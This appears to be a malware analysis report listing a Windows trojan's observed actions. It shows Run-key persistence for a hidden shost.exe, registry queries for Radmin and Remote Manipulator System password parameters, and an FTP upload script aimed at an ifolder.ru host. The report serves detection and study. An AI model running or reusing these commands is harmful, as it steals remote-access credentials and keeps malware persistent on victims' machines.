Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'ehos' = '%WINDIR%\shost.exe'
- <SYSTEM32>\ping.exe -n 2 upl.stg866.ifolder.ru
- <SYSTEM32>\find.exe /I "DisableTrayIcon"
- <SYSTEM32>\reg.exe Query "HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters"
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\chcp.com 866
- <SYSTEM32>\ipconfig.exe
- <SYSTEM32>\hostname.exe
- <SYSTEM32>\find.exe /I "ehos"
- <SYSTEM32>\reg.exe Query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
- <SYSTEM32>\attrib.exe +h +s %WINDIR%\shost.exe
- <SYSTEM32>\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ehos" /t REG_SZ /d "%WINDIR%\shost.exe" /f
- <SYSTEM32>\ftp.exe -s:%WINDIR%\temp\ftp.txt -i upl.stg866.ifolder.ru
- <SYSTEM32>\find.exe /I "Pwd"
- <SYSTEM32>\reg.exe Query "HKLM\SYSTEM\Remote Manipulator System\v4\Server\Parameters"
- %WINDIR%\Temp\ftp.txt
- %WINDIR%\Temp\name.txt
- %TEMP%\2831.bat
- %WINDIR%\<Virus name>.exe
- %TEMP%\2831.bat
- %TEMP%\2831.bat
- %WINDIR%\Temp\ftp.txt
- 'localhost':1039
- 'localhost':1037
- 'up#.###866.ifolder.ru':21
- DNS ASK up#.###866.ifolder.ru